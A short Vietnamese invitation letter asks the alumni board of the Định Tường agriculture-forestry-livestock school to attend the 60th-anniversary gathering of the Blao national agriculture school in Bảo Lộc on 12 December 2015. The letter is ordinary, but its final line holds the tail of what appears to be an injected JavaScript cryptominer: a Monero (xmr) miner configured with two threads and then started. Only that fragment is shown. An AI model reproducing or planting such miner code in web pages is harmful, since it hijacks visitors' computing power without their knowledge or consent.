THƯ MỜI HỌP MẶT TRƯỜNG QUỐC GIA NÔNG LÂM MỤC BLAO

THƯ MỜI HỌP MẶT TRƯỜNG QUỐC GIA NÔNG LÂM MỤC BLAO

Kính gởi Ban Đại Diện Cựu Học Sinh
Trường Trung Học Nông Lâm Súc Định Tường.

Thưa Quý Anh Chị. Nhân dịp kỷ niệm 60 năm ngày thành lập trường Quốc Gia Nông Lâm Mục Blao cũng là tiền thân của Trường Trung Học Nông Lâm Súc Bảo Lộc.
Chúng tôi trân trọng kính mời Quý Thầy Cô, và Anh Chị đại diện Trường Nông Lâm Súc Định Tường về tham dự ngày Hội Truyền Thống được tổ chức tại Hội Trường của Trường Cao Đẳng công Nghệ Bảo Lộc vào lúc 10 giờ sáng ngày 12 tháng 12 năm 2015.
Rất mong được đón tiếp đông đủ Quý Thầy Cô và Anh Chị trong ngày vui Đại Hội để nối tiếp tình thân ái đoàn kết giữa Bảo Lộc và Định Tường.
Trân trọng kính mời

TM  Ban Tổ Chức
 Bùi Thị Lợi

     
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();